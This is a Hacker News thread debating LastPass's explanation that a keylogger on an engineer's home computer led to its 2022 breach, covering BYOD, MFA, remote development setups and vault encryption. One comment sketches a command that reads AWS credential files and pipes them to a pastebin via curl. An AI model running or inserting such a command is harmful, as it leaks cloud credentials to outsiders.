Hacker News new | past | comments | ask | show | jobs | submit login
LastPass says DevOps engineer’s hacked computer led to security breach in 2022 (9to5mac.com)
376 points by mikece on Feb 28, 2023 | hide | past | favorite | 261 comments



I'm not sure the description is what actually happened. It doesn't have the ring of truth to it.

That said, LastPass is not deserving of any trust as a password product of any kind. That a password was captured by a keylogger on a Dev Ops home computer shows that they don't understand how to secure remote computers, the meaning of defense in depth, the importance of proper login authentication, or how to secure data at rest. Each of these points are close to the core of their business.

I don't wish them ill. I hope they recover from this, but they need to understand security to produce a security product.


> I hope they recover from this, but they need to understand security to produce a security product.

it's because the market doesn't actually pay for a secure product, but the appearance of one.

The end-user buying cannot really discern whether the company's product is actually secure. There's no third-party standard auditing (let's say, a gov't organization).

Banks are run securely, not because I personally audit them, but that the gov't mandates liability onto the banks for losses from their insecure systems. So the banks are secure, because they stand to lose a lot. The same must be mandated for all companies imho, or insecure companies would continue to exist and thrive.


Eh banks run securely because it’s very difficult to steal money.

Hard currency theft requires a physical attack and “digital currency” is just essentially a spreadsheet that requires a settlement mechanism such as correspondent banking to work.

Banks transfers are nothing more than messages going between different branches and banks there is nothing being transferred other than orders.

The attack surface on modern banks especially large ones is actually ridiculously small since you don’t only need to defraud or compromise a single bank but also the entire system and all other banks which are using it since once the offended bank notices some inconsistency it can issue a notice to reverse any offending transactions.

Also since bank transfers are often liabilities for most banks e.g. when an account in First Capital transfers $1M to someone in First Direct it means that First Capital now owes First Direct $1M which makes First Direct a creditor which is why it will likely quarantine the funds until the transaction is fully verified and settled and even then there still likely going to be a cooldown period to reduce the risk even further.

Most of the security within banks is designed to deal with internal threats since the entire banking system is essentially based on mutual trust which gives individuals even fairly low ranking branch employees the ability to authorize fairly substantial transactions.


> Eh banks run securely because it’s very difficult to steal money.

i think you got the cause and effect wrong - banks are run securely because it's made to be very difficult to steal money. And stolen money gets tracked (if you did steal a large amount) by anti-money laundering laws, which makes it hard to spend it.

Why is banks' attack surface small? Why is all these other "systems" in place to make stealing money difficult?

Why isn't the same happening with stolen credentials, or data?


It's telling that in areas banks don't have responsibility (criminals breaking into individual accounts and draining them for example) they are insecure. SMS 2FA, short pin numbers, etc.

https://www.bbc.com/news/business-64240140.amp

> He said Barclays told him it would do an internal fraud investigation which later resulted in Mr de Simone being held liable for all the losses.

> "They could not identify a point of compromise from the back end - to them it looked like the pin had been entered.

> "The only thing they could suggest was that someone knew the code therefore it's gross negligence on my part apparently.

In the olden days banks used to have decent security. Once you gain access to the account, to pay a new payee you'd need your bank card and pin number to do the 2FA. Now it's all the same phone.


The case isnt settled yet.

> After eight months of evidence gathering and dealing with the police, an investigator at the Financial Ombudsman Service (FOS) upheld Mr de Simone's complaint against Barclays which now, if it disagrees with this, has the opportunity to ask the ombudsman to examine the case.

They are just trying to wear him down.


I think you got them wrong.

Bank customer data breach is not that rare.

Money in bank is "secure" because they are cross checked with counterparties. Their data leaks like everybody else.


This. At the end of the day, if it is a significant transfer there are people in locked rooms that have to call each other and independently verify a transaction brokered by a third party. And if you don't pass a background check, and don't need to be there, you don't get in that room.


All this might be true in the US where realtime transfers don’t really exist.

But here in true UK where we‘be had realtime, high volume transfers for at least a decade, it’s very possible to steal digital money and move it on before the bank notices.

Faster Payments in the UK are expected to be credited and spendable within 20min, normally it’s spendable within milliseconds. The actual settlements happen every few hours, and all of it is pretty much automated. Additionally because the money can be credited so fast, there is no recourse for a bank to recover a payment they’ve authorised, they have to settle it. The sending to the transfer message is as good as sending the money, once it’s sent, they have to pay, if they refuse, the money is taken from their collateral at the payment network to pay their debt, and they’re disconnected from the payment network.


I’m from the UK that’s for relatively very small amounts and it’s insured, this is the cost of doing business and there are still a lot of fraud checks especially for new payees.

If your account all of a sudden has 10’s yet alone of 100’s 1000’s or of transfers in it will be quarantined.

HSBC locked my account just last week for 7 or 8 transfers of circa £10 all being made all in the same day from colleagues from my work since we bought a gift for someone that was leaving and settled the payment.

Authorized push payment fraud still does happen but it’s fairly negligible in the big scheme of things.


> If your account all of a sudden has 10’s yet alone of 100’s 1000’s or of transfers in it will be quarantined.

> HSBC locked my account just last week for 7 or 8 transfers of circa £10 all being made all in the same day from colleagues from my work since we bought a gift for someone that was leaving and settled the payment.

I would be careful assuming that HSBC is representative of how banks in the UK work. They’re well know to be the most trigger happy bank when it comes to account and transfer freezes. HSBC was probably the number one cause of complaints related to transfers while I was working in the fincrime team of a different bank.


> Eh banks run securely because it’s very difficult to steal money.

Banks run securely because they have serious and mandated change control processes, applied against a formal classification of the importance of systems.

Something you generally won't see outside the T100 of non-bank companies.

This means their IT evolves glacially slow, but it does keep things stable.


Banks are a lot less secure than eg Google. And Google has fewer government mandates on them than banks do.

(I worked both in banks and at Google.)

However you are right that Google thinks they would lose a lot from being less secure.


Sometimes organizations that look less secure are actually more secure just because they degrade gracefully under attack and/or can more easily mitigate/revert the consequences of successful attacks.


Banks' true security is rooted in the real world.


Depends on what you are talking about.

Stealing cash from the vault: sure, that's 'real world' security.

Protecting their customers' data: nope, that's all digital.


Indeed, and they are happy to close branches left right and centre in the UK. My village just lost its last bank.


There's no such thing as a secure product, but secure enough. And lastpass storing billions of password is a very high value target. They probably have hackers banging on their firewalls all day, every day


Also for convenience over security. Like how Signal was the best secure option out there but people went to Telegram instead because even if it was (slightly?) less secured it’s a lot more convenient.


Telegram isn't end-to-end encrypted by default.


Unfortunately losses from insecure banks are considerably easier to quantify than losses from insecure secrets storage.


While it's very civil of you to wish recovery upon LastPass, I don't really think the product is deserving of redemption. This is not the first major incident and it demonstrates little growth in relation to prior breaches. The world as a whole would probably be better off if LastPass were to breathe its last.


They need to sell it to someone else with a better track record.


I agree with the GP. Why would selling it solve the issues with the product?

How much of the product can be salvaged?

They have a well-known brandname, but it is arguably radioactive now.

The product as software can be rebranded, but why go through this effort if the ubderlying software has proven faulty so many times in the past?

A similar effort can be invested in making open-source password managers better, so there is a clear opportunity cost to salvaging LastPass.

Plus a sale would surely only directly benefit those most responsible for LastPass' issues. It would mean they are directly rewarded for their incompetent execution..


It seems like nothing is necessarily wrong with the software itself. Its the opsec surrounding the software. The most secure software in the world can be pwned if you can get access to the lead dev's system or the build system itself.


Yeah, because the description is inadequate. Is this BYOD? (… seems like not the employee's fault.) Is this the employee used the same password on the laptop and home, got credential stuffed, and LastPass isn't using MFA¹? (…seems like not the employee's fault.) Was there some jump from compromised home laptop to corp laptop? (The network is never to be trusted. …seems like not the employee's fault.)

The buck is supposed to stop at security, not at each employee's personal hygiene … if your game plan depends on the latter, it's game over.

There's more here than is being written, and I can only imagine because the truth probably stinks.

¹except TFA mentions MFA … but the mention of it doesn't really make sense.


> The buck is supposed to stop at security, not at each employee's personal hygiene … if your game plan depends on the latter, it's game over.

I have to take security trainings twice a year that literally talk about the buck stopping at my digital hygiene and I better not fuck it up for The Company.

Companies have to understand breaches will happen, but preparing employees on how to spot attacks or understand when they've been breached is a huge component of their ability to repel or minimize attacks.


Security is basically layering imperfect solutions on top of each other until the statistical probability of breaching ALL of them gets small enough to satisfy the requirements of the organization.

In the case of LastPass, they're holding data (which they shouldn't have been to be fair) that's INCREDIBLY attractive to everyone from script kiddies to nation state actors. When it comes to keeping out nation states the threat model can get kind of wild and difficult to engineer for while building what's ultimately a consumer facing product. However, in this particular case it's fairly obvious that bad IT policies lead to an issue and LastPass got burned.

I would be more forging of LastPass but letting employees do BYOD means you have to trust everyone that ever uses that computer including spouses and children. It's just really dumb.


LastPass’ lackadaisical attitude internally for defense in depth is indeed embarrassing.


> I have to take security trainings twice a year that literally talk about the buck stopping at my digital hygiene and I better not fuck it up for The Company.

this is mostly so they can pin it on you when it inevitably happens (rather than the management)


Right, but for your average user. If your machine is infected with a keylogger that results in a stolen password because of a vulnerability not timely identified and corrected.

That's not on you as an employee, that's on the security team for not implementing compensating controls/defence in depth.

Yes you have a responsibility to detect phishing emails, not writing down passwords, inserting USB's etc. But if something happens to you completely behind the scenes during your normal business, it's not on the employee.


> Yes you have a responsibility to [...] not writing down passwords

Most places force you to rotate the password so I would not say it is a responsibility to not write it down.

I do it. It is like there is a fixed number of passwords per life you can remember or something.


Almost 20 years ago, I worked with this (not particularly competent) sysadmin. Policy said the root password had to be rotated once a month. So, in July 2003, they set the root password to blah0307 (where blah was some random word, which I forget now but knew at the time.) I wasn’t actually supposed to know the root password, but one of my colleagues let me in on the secret, including the repetitive pattern. I think the security auditor ticked the box “root password changed every 30 days”, but never asked what the password actually was.

I know some places have rules like “must have at least N characters different from previous passwords”. However, depending on the exact rule, people can come up with easy-to-remember workarounds: e.g. the “blah” bit is ”foo” in even months and “bar” in odd ones.


Even more so, I think writing down passwords on paper is actually pretty good security:

An attacker can only hack the paper with physical access to my office. But if they have that, they might as well install an physical keylogger.

You can also combine a written down fragment of the password with a remembered one.


> An attacker can only hack the paper with physical access to my office.

... and there are lots of unrelated people with physical access to your office. Cleaning staff, building maintenance, HVAC technicians, printer service staff... and all of these may not have the same level of background checks as your company has.

And even if you hire all of these yourself (which makes sense at a certain scale), that still doesn't protect you against marketing inviting a camera crew and walking around everywhere in one of these typical "life at the office" short films for Linkedin. IT staff offices seem to be very popular for such films since they're usually the most personalized rooms with lots of nerd stuff on the walls and desks.

Besides: swiping a photo of a post-it leaves no evidence, whereas installing a physical keylogger certainly does.


Nobody said the piece of paper has to be a post-it on your monitor. It could in a folder in a locked cabinet.


Just write it in your class syllabus; no one will ever find it there.


Yes. What I had in mind when I wrote my comment, was to stick the piece of paper in your wallet. But your suggestion also works.


I'm sure they meant something analog like on a sticky note rather than in a password manager, where it should be stored.


My bank still won’t let me paste a password so at least that bank doesn’t mean use a password manager!


If you start dragging a password from 1Password, the window disappears and you can release your mouse over a field elsewhere, and it will get typed in there (instead of pasting). This may or may not work for your case.


You missed the point of what I said, I was just using examples that are the responsibility of the employee.


I agree with this assessment. I am also required to run security scanning software by corporate that inspects a lot of activity on my machine.


I expect the amount of companies that would get fucking owned by simply managing to execute

cat ~/.aws/* | <some sort of curl to a pastebin>

On a devops/senior dev machine is colossal.


What I want is a secure shell (somehow) where my env variables are encrypted and on access I get a prompt to either use a fingerprint reader or a password to unlock them for the process.

Anyone know of any such option? What I've come to use are separate env files that I source in various directories before running the commands that need crednetials, or a tool that decrypts a file, loads it into an subprocesses env vars and runs a program (something like mozilla/sops), but I still find that too cumbersome, I'd like it transparent and integrated with my shell.


aws-vault[0] does this, but only for aws creds

0 - https://github.com/99designs/aws-vault


Yeah this is a good tool, if annoying at times.

A better way would be to not allow user accounts to deploy anything in any sort of prod accounts, instead only allowing this to happen through CI.


Combining direnv with sops can be partial solution here.


> ¹except TFA mentions MFA … but the mention of it doesn't really make sense.

I guess there was a loophole in their MFA integration. Maybe they accepted the same TOTP twice - in a multi-region setup I guess this might be a trade-off that somebody might risk. With a keylogger one can theoretically steal a TOTP anyway or do other more sophisticated shenanigans.

> We enabled Microsoft’s conditional access PIN-matching multifactor authentication using an upgrade to the Microsoft Authenticator application which became generally available during the incident.

Maybe switching to push notifications with number matching is their mitigation for that (e.g. without affecting multi-region replication / performance).


We are looking at a highly sensitive asset, though. A vault that is only used by four employees (per the original press release, not in the 9to5mac article) and contains keys for the production backups.

At this level of sensitivity you need to consider "should the employee's personal plex server be able to connect to this" and the answer might be a No. At this point you should be issuing them a PAW and a physical security key and auditing the shit out of it. It's not like lastpass can't afford it.


I understand what I'm asking for is "educated conjecture" more or less, but what would you surmise might be actual plausible situations rather than what LastPass is putting out as PR? Just asking as a laymen who is curious with no skin in the game.


If you BYOD then do your work stuff on a VM. It’ll help with security and has the benefit that you can just delete the VM when you change jobs.


Are there any reliable ways to secure remote computers from keyloggers _and_ still provide an efficient software development environment for non-trivial projects?

All of the software engineers I have seen have a fairly unrestricted environment -- Linux machines, with sudo access, often with passwordless root access via "docker" group, and with non-intrusive "endpoint protection" system. It would be normal to for someone to run "npm install" on their machine, or check out a random github repo they read about and run code from it.

Such machine would be a prime target for malware. And endpoint protection I have seen seems to be really stupid -- basically hooking "exec" calls and checking for exact hash match (!). Any serious malware should be able to bypass it without much effort, and if it only stays on a single computer, the detection chance is pretty low.

(I have also seen some poor souls who were stuck on locked-down Windows machines.. but they usually ended up using their machines as remote terminals, doing most their actual work on some remote server. And that server is sudo-capable Linux with light/no protection, and see previous paragraph. I suppose if _that_ is infected, at least Lastpass might not be stolen... unless people start browser on server and log into lastpass there, I've seen this happen)


Personally, I'm not a fan of the answers that amount to a cloud-hosted thin client. I use these at work, they're absolute technological marvels, but they suck.

The real answer is a zero trust network that implements:

- multi factor auth

- deployment approval gates

- end to end service encryption

- ALE for secrets and keys

- password managers

- WireGuard tunneling or equivalent

- read only production environments by default; major levers to pull in order to write

- fully partitioned environments, all of which partitioned away from the corporate network of laptops, printers, and security cameras


> - read only production environments by default; major levers to pull in order to write

Yes. In general, it's a good idea to split state management from business logic.

In the simplest thing, that means that eg you have a database that's separate from the rest of your site. But the principle applies more generally.

Useful for keeping things simple.

To go further: if you want to log something, you send it to a log server that is super simple and can only write to one location. So if someone takes over your business logic service, they can't write arbitrarily.


You've already included the answer - "using their machines as remote terminals, doing most their actual work on some remote server".

The developer uses MFA (TOTP, Push Notification, Yubikey etc) into a virtual desktop inside the organisation (Citrix, VMWare Horizon, etc).

From there, the developer can SSH / whatever into their development environment - which is hosted "inside" the corporate network, or their cloud provider, via internal links.

All code, and dev boxes live "inside" the corporate network, and only keypresses, mouse movement, and screen diffs are sent back and forth.

Most remote access packages can prevent clipboard, USB device, file transfer etc.

If you need a password manager for work purposes, then it lives on the corporate managed network - not your remote laptop/desktop - and to be really paranoid - you only ever "copy/paste" those passwords - you don't type them in.

If you really want to lock it down further, give the remote workers dedicated corporate equipment that they only use to access the remote desktops, so you can prevent some things like screen capturing, and really lock down the software to prevent things like keylogging software/malware.

You also should have the entire development environment segregated from the "business" corporate network as well.

It's only really an issue if you want to have offline developers - in which case I don't have any thoughts ready to hand - (but would expect it to be a very locked down machine, possibly with an even more locked down VM inside it).

As someone who regularly uses multiple layers of Virtual Desktop -> Virtual Desktop -> Remote Desktop, provided the network can handle it (on both your local network, and the corporate network), it works surprisingly well.


This is both a misunderstanding of the problem and an attempt to solve an administrative problem using technology... which cannot really solve it.

Developers have nothing to do with this. It's a common practice in companies that have "expensive" production environment (eg. VMs rented from AWS) that developers never get any kind of access to production environment. Ever. At all. No need to tie developers' hand by putting them behind a ton of unnecessary firewalls. They have no need for the sensitive information and shouldn't be burdened by protecting it.

The few people who do have access to company's "expensive" production environment are / should be very few people, most likely in the infra / DevOps department. These people do need to follow special protocol for communicating with the "expensive" environment, which, likely, doesn't happen all that often. Depends on the product, of course, but unlikely to be more than once a day, or even once a week.

----

PS. In many, many years of being in infra / system / automation I had never typed any passwords for any important services I had to use. They are usually difficult to type due to having all kinds of Unicode characters I wouldn't know how to reproduce w/o a little research. It's also very rare that they end up in system clipboard, since I usually end up using something like vi+tmux over SSH in Emacs' ascii-term to copy the password from somewhere and paste it somewhere else. So, stuff like AWS keys would have to be stolen by taking screenshots of my screen or something like that...

I mean, why on Earth would anyone deploy to production environment from their personal laptop? Normally, deployment is made from some sort of a testing / staging environment where the system was being tested / archived before shipping it to the next stop... It sounds like some kind of emergency / unplanned situation where a DevOps had to log into the remote system from their laptop.


Are you misunderstanding the term "DevOps"? You build it, you run it. If a DevOps team only runs things other developers have build, it is not a DevOps team.


In this case, DevOps shouldn't be rearchitecting, developing, or changing a password management's solution, crypto, architechture, or design in any way. Not in the slightest.


No. I'm not.


There seem to be two competing definitions


I'm all in for VM based privilege separation, but that won't protect you from infected endpoint. Assuming this was a targeted attack, folks that achieved RCE on DevOp engineer's machine could have waited for her to authenticate and then inject keystrokes into VM, SSH, VNC, Remote Desktop, Citrix or whatever remote management system they're using.

Honestly, this HN thread is full of bad advice and factually incorrect patronizing. Okta-style system asking to accept every single permission would not have protected from an attack, because Okta caches and reuses authentication tokens. Clipboard snooping / keylogger detection wouldn't have worked because none of these solutions are robust against targeted attacks.

The only thing I can think of which would have (and should have) helped is alert SOC / incident reponse team. Good luck finding one though.


Glad to see someone else with the same reaction, because a lot of this advice is... interesting, like people who are worried about keyloggers but think the clipboard is safe.


In my experience, I find that working with Virtual Desktops is the most frustrating user experience as a developer you could have. I prefer working in containerized environments which are more efficient and do not require the same amount of configuration processes as a Virtual Desktop.

You should check some solutions out.


> You also should have the entire development environment segregated from the "business" corporate network as well.

This is the key point, otherwise you'll also just get a linux machine with developer root access, but EVEN CLOSER to the corporate network.


For most development work, this would probably cause a serious productivity drop, but it definitely makes sense for the portion of the work that involves accessing critical production resources. For DevOps roles, that could well be the majority.


My company operates in a Windows centric industry and our software team uses it as well.

It turns out you don't need administrative privileges for a lot of dev work (installing and running vs code, python, node, many databases, etc...).

My experience is that sudo apt-get install is a Linux Distro thing, most programs don't need special permissions as long they are installed in user scope.

So, answering your question, our devs are like regular users: when they need to install something that needs privileges they call IT. Surprisingly, that rarely happens.


Privilege escalation on Windows is super easy though, every red teamer I know has a bunch of ready to use exploits (most of them public) up their sleeve. And it is virtually impossible to get a good baseline of a developer's machine, so I'm pretty sure every SOC out there is simply allowlisting huge swaths of your software.

You can sorta kinda harden these systems, but that would only work against common malware. And you generally can't isolate senior engineers in their own little DMZ, so any RAT on their machines usually leads to catastrophic consequences.


Privilege escalation is a red herring. Everything you need to compromise production from a developer PC is either available for a regular user or not available at all.


Anyone with this level of access should know not to run random github projects or npm install in the most sensitive context. The choice is between easy or secure. You can't have both and that's a reality one has to accept. It's not that difficult to spin up a VM when you want to fuck around and isolate it from sensitive data.

Especially as a "DevOps engineer", gatekeeping and providing least privilege access is in the job description. I understand getting lazy and relaxing the rules in some contexts but not when running a password manager on this scale, unacceptable.


Don't do development on any system that has access to production. Develop on dev lane resources.

Production access should only be allowed from a locked down system with no open ports and a very small whitelist set of software. Operations for said system should be simple. Deploy version x with necessary provisioning. Backup system. Restore system. View monitoring and logs.

You must minimize the surface area connected to production.

On the network side the system with the keys for production is also firewalled off from general Internet access. So potential malware can't phone home.


Give you a MacBook and a cloud Linux dev machine (or as many as you want).

Secure access to dev environment with multiple easy factors - MBP biometrics, yubikey, etc

Enforce strong password and FDE on the laptop.

Obviously doesn’t need to be a MacBook, but you stated an aversion to overly locked down windows laptops.

In general, just enforce strong multifactor creds when accessing internal resources.

You can also enforce device very requirements, so a stole device or yubi can’t be used either.

Then do what you want on your Linux instances in the cloud. They’re protected with their own controls.


> That a password was captured by a keylogger on a Dev Ops home computer shows that they don't understand how to secure remote computers

I tend to disagree. The potential for any single employee to do substantial harm to any business is incredible and designing a system to make that not possible is nigh impossible.

It's neither the humans nor the institutions fault. It's just that systems involving humans are incredibly hard stuff. You are constantly weighing rigidity of the system with the potential to do harm within the system. How much way can it give to make it possible for humans to do their job in a complicated world?

If you go down the path of "we need a process for everything" you are going to end up with a lot of processes. The inherent problem with that approach is that (for most businesses that are not exactly amazon) a lot of processes can not not feasibly be systematically enforced and rely on being honoured by a human a juncture points, to an extent that makes you very uncomfortable when you consider what mechanisms you system has, for when they just don't.

As of now, most system simply rely on humans to do the right thing at the right time, for no other reason than it being the right thing and they also knowing that, for the whole world to not go up in flames.


If a password was captured by a key logger, rather than a session token being stolen, they didn't implement 2FA for this login.

They are also talking about a home computer. In my company, VPN access is limited to trusted devices; therefore, sensitive systems can only be accessed from a corporate machine.

Security at LastPass seems substandard for a company storing security credentials. Unfortunately, from my experience, this is relatively common, and regulators need to start issuing significant fines or prison sentences for this to improve. Unfortunately, it is too easy for CTO/CISO to find a scapegoat and avoid scrutiny.


There isn't enough information to tell. With keylogger you can steal password every time it's used, MFA will just prevent / limit it's use. So it doesn't tell us anything about their MFA implementation and whether attackers reused session or did some other trick (e.g. time based tokens by design can be used to multiple times within the given time period or you could hijack first MFA token while it's being sent to the server and present an error; now you can use this token yourself while user successfully logs in with the second token).

Once you get password vault, it's very likely that you also get creds necessary to set up VPN. Besides, there are ways to bypass (poorly implemented) VPN and relying on VPNs isn't even the best practice nowadays.

I agree with you that a few CISOs getting sentences would be the fastest way to raise the bar across the tech sector, but that's never going to happen.


A secure MFA implication requires a second device to authorise the login. As you correctly point out, generating a code then and entering it on a compromised machine is SFA, as it treats the token as a second password. If MFA is implemented correctly, the only attack vector should be the session token.


Last pass have different threat model than most of companies. They should have higher standard than everyone else. Employee privete PC should not have access to production data. They should you vpn and multi factory auth and everyone should be trained in company.


Restricting access to corporate environments from trusted machines is trivial using any form of MDM. No one should be working from their personal machines. That's gross negligence.


> Restricting access to corporate environments from trusted machines is trivial using any form of MDM.

Until somebody pulls out their personal cell phone, and takes a photo of a screen containing highly confidential data, to then send it to someone else, because, dang it, they had to get something done NOW and it seemed very convenient.


No security measure is 100% effective nor 100% moron proof, but in many companies that would be a fireable offense, which gets you pretty far.


Some consumer electronics companies have security guards enforcing that no cellphone gets on premises. If you want security you can get security, but is the price worth paying? All depends on the cost of a breach. Given that last pass still has customers maybe they estimated their costs just right ;) that cannot be said of some certificate authorities..


Even if they got pwned and the hackers got full system access like this the screw up is still definitely in the implementation right?

Isn't this like basic stuff where you would use encryption that only the end-user can bypass?


To me it says their security is not up to par, and that employees were allowed to take secrets home. Which is fine to a point, but it has to be a company managed, remote-wipable and locked down system if it's people that hold the literal keys to the secure castle.

Same with the Canadian ban on Tik Tok, why are they even allowed to have phones where they can install any software on?

BYOD and personalization is fine to a point, but only if you don't have high level access.


Am I assuming in this case the engineer was using his home PC to work?

This isn't unheard of in the industry, Engineers using BYOD devices or similar to work from home. But with a company with a risk profile as high as LastPass this seems _incredibly dumb_.

You would assume anyone with the keys to the kingdom was working on a company provided device, or any device that fits a compliance framework based on their own risk needs (which should be massive!).

E.g., endpoint management, AV/detection, FIDO2 with Yubikeys to access AWS as an admin and otherwise. Just a few off the top of my head.


My company isn't nearly as high profile or security focused and we're not allowed to use our own computers for any work related purposes,and our work laptops run threat detection software and we have a whitelist of software we're allowed to install.

I'm surprised that LastPass's policies aren't at least that strict.

My company has what I think is a big hole in this policy in that we're allowed to use our own phone for email, a few corporate apps (like Jira) and our corporate password manager (not LastPass), but IT doesn't do any management of phones (other than being able to wipe them remotely if you're connected to the company email server). I suspect that the company doesn't want to spend the money on giving everyone a managed phone.


As much as LastPass seems to be trying to pin this on a single engineer, and not a broad vuln, the fact that they have such lax policies around access management, especially for a password management system, tells me enough I need to know never to use them again.

Waiting for the rebrand and the incoming lawsuits.


Yep. The symptom being that a problem of this scale can be caused by a single engineer, which points to the root cause being deeper and potentially systemic.

The question for future trust is: what's been / being done to prevent the same thing from happening again due to another single engineer?


Preventing this thing from happening costs a lot of $$$, so pretty much everyone just "accepts the risk" seeing that probability of something like this happening to your company (during your tenure) is still super low. All companies with somewhat robust security posture I know have had a string of incidents in the past, that seems to be the only thing that can motivate to put $ in security.


It's not really very expensive to issue employees a laptop (which costs a percent or two of an engineers annual salary) and tell them "All work must be done on the work laptop, no personal files/software allowed on the work laptop". For a little more money, they can add active management of the work devices, but just keeping work and personal device use separate would have prevented this.


No there's no way to install a key logger on a company device?!


There is, but in this case it was the employee's personal software that allowed the back door. It's ludicrous that LastPass allowed employees to put sensitive data (i.e. their password manager) on personal computers with, apparently, no restrictions on what software they run.

Closing the barn door doesn't guarantee that the horses can't escape, but when you don't even have a barn door, it's hard to blame the stable boy when the horses get out.


They answer that question directly here

https://support.lastpass.com/help/what-have-we-done-to-ensur...

TLDR;not much


Yeah, this is the equivalent of blaming an intern for nuking the prod database. Maybe they were careless of maybe that shouldn't be possible to begin with.


If your company uses something like Duo they still can do some security posture on mobile devices like prevent rooted/jail broken devices or have a minimum iOS/Android version.

It’s also possible that the stuff mobile devices can access are walled off from the internal network with a DMZ or firewall.


The company I work for has a setup for a separate work profile on my phone, which I understand to have separation enforced at the OS level. The work profile has a separate set of apps installed that are limited to ones that the company sanctions, and even for stuff like web browsing, none of the state is shared if the same browser is installed in my default profile. From talking to coworkers with iPhones though, this doesn't seem to be an option now (not sure if iOS supports it but my company hasn't set it up or if this sort of thing isn't supported on iOS at all). This seems like a much better solution than giving people two separate phones or forcing people to hand over control of their devices to their employers, but I guess not enough companies want to do this enough for it to have become the norm.


How exactly can your IT department whitelist all software on your device? Are you using any build tools that install third party dependencies or are you using any development tools that do the same? Is your shell locked down so you can’t run command as a super user?

I assume your IT just has a whitelist for some stuff but I can’t imagine actually being a developed without super user privileges. Unless your doing some sort of very controlled software development.


My company fixed that by only allowing SSO login on company devices. Everything else is SSO. Systems that weren’t SSO-enabled were replaced.


> You would assume anyone with the keys to the kingdom was working on a company provided device, or any device that fits a compliance framework based on their own risk needs (which should be massive!).

You mean one of those company devices that is so locked down that they are close to impossible to work on?

Like if you need to install a new (part of) a toolchain, you need to go through IT which takes between 3 weeks and 6 months?

But your deadline is next week and your manager doesn't care about your IT "excuse", so just use notepad and CLI (or your own PC where you can do in 1 day what would otherwise take you months).

Those devices... yeah...


As someone who works in gaming FQA with crazy locked down machines - we get software installed if necessary. Don't paint everyone with that brush.

We also have two PC's per desk(plus consoles) so that our clients software isn't exposed.

I don't get how a company like LastPass didn't have basic security like this when a FQA with a whole bunch of semi literate (in IT security) has a ssytem setup.


You are making things up. Such a company probably exists somewhere, but I yet need to hear someone telling me a big-name tech company is doing this.


I could see this kind of sophisticated attack easily working on some random company with fairly lax BYOD policies. Makes sense, it was a rather sophisticated attack when you look at your typical medium sized company. But if your entire company and organization is built around keeping things secure, THIS is what brought you down? This isn’t getting owned by some unforeseen 0day, it’s just sloppy opsec.


I don’t think he’s necessarily working on his pc. He probably just had a shared LastPass account between work and his pc.


as a devop a shared account mixing private and business? would be a security breach if you ask me


I'm betting work gives him a free family subscription, ideally you'd have them as separate accounts, not sure how the local vault works under the hood in that situation.


That’s absolutely no better.


This is completely unheard of for any company with any level of security. I’ve worked for 60 person startups that wouldn’t allow this.


i completly agree. Its not so hard to do MFA all the way down either


So, with most password managers, when you authenticate on a new device, you are prompted for MFA.

The user had a keylogger installed on their machine, so the attacker could collect the master password, but how did they login to the vault on a new machine without MFA?

Did they get the MFA seed and login on a different machine, and nobody received a "You're using LastPass on a new machine, if this wasn't you..." message?

Did they exfil all that data to the compromised machine first, then out?

Unless I'm missing something, this doesn't seem right.


They had code execution on the persons computer, the encrypted vault is downloaded and stored/cached on the computer - you only need the master password at that point to decrypt it. Or to read the decrypted version out of the process (e.g. your web browsers memory)

The 2FA part in the password managers (and least in the major players currently) is to get a copy of the encrypted vault from the server. The user did that part, and the encrypted vault was not easily accessible locally.


Seems like a broken 2FA implementation.


2FA can't protect you from malware on your machine.


Sure, but I wouldn't expect the vault to be accessible without 2FA each time it is cached. 2FA should be used as part of the decryption process even if the vault is cached.


You expect 2FA to be used for decryption? I'm not aware of any system with that does that that has any significant amount of usage.

Even if the 2FA was used for decryption, it wouldn't really make you much safer, because malware can steal the decrypted vault out of memory right after you type in the 2FA. A HSM would solve this, as long as the HSM has some out of band way to communicate with the user, such as an approval button that malware can't press and a screen saying what password to release.


> Even if the 2FA was used for decryption, it wouldn't really make you much safer

If the second factor is stripped for some arbitrary time, you don't have 2FA anymore. Your argument that "any adversary can read the vault from memory" is a weak one, we might as well not have passwords with that attitude.

The point of a second factor is that BOTH need to be present to get to the secrets. If one of those factors is stripped away for "convenience" we're misunderstanding the point of 2FA entirely. I can't make this any clearer.


>Your argument that "any adversary can read the vault from memory" is a weak one, we might as well not have passwords with that attitude.

It all comes down to threat model. If you don't have malware on your machine, 2FA and passwords are quite useful. If you do have malware on your machine, they're basically useless. This is basically the same for any service. Name one website or program that's safe even if you have malware on your machine.

>If one of those factors is stripped away for "convenience" we're misunderstanding the point of 2FA entirely. I can't make this any clearer.

It's not for convenience. It's because there's no practical way to implement encryption/decryption with 2FA. You seem to think there's some practical way to do it, but there isn't.

Lastpass 2FA protects against the threat model of an attacker who has stolen your password. In that case, the attacker cannot steal the contents of your database because the attacker can't get any form of the database, encrypted or decrypted due to not having the 2FA. Unfortunately now that an attacker has stolen all the encrypted databases by compromising Lastpass itself, this threat model is no longer realistic against this one specific attacker or any attackers that this attacker shares the loot with, because they now all have your encrypted database.


> You seem to think there's some practical way to do it, but there isn't.

It is an implementation detail of the password manager itself. Any password manager can update their implementation to ensure the second factor is always needed when decrypting the vault. I'm not sure why you think this is an impossible feat. It's a choice that can be made.


How? What type of 2FA are you talking about? Is there any that does this that many people use?

The only thing I know that does encryption with 2FA is https://keepass.info/plugins.html#otpkeyprov . But I highly doubt it has much usage. It's going to be annoying typing in a 2FA every time you decrypt your password database (I decrypt my password database maybe 10 times per day). More concerningly, if you press the button on your 2FA device (this is HOTP, which requires you to press a button to get a new code) too many times, or typo the 2FA too many times, you can permanently lose access to your database because the HOTP device will advance past the point that the database supports.

So yes, it's a choice that can be made, but it has very major downsides.


why wouldn't it?

And its not so much about protecting me, but to protect company interest right?


Read the technical details of TOTP, at root, you and the other end are performing similar mathematical operations on a shared secret such that knowledge of a single result gives you no information about later results. The actual check is just a string compare; the result is not included in the vault decryption operations in any way. Thus, if you have root, you can just alter the Check2FA() function to return true. I'm not aware of any encryption algorithm that can include rotating 2FA data in the actual decryption process.


There's a keypass plugin that allows you to encrypt and decrypt your database with HOTP. I doubt it has much usage. It seems really inconvenient, and also potentially dangerous, because if your HOTP provider gets too far ahead of your database (you press the button too many times, or typo too many times), you permanently lose access to your data. You would want a HOTP provider that supports rewinding to avoid that problem. But I think HOTP doesn't really support rewinding very much.

https://keepass.info/plugins.html#otpkeyprov

But this is beside the point I was making. My point was that even if the the database was encrypted with 2FA, right after you enter your 2FA malware can steal the decrypted database out of memory.


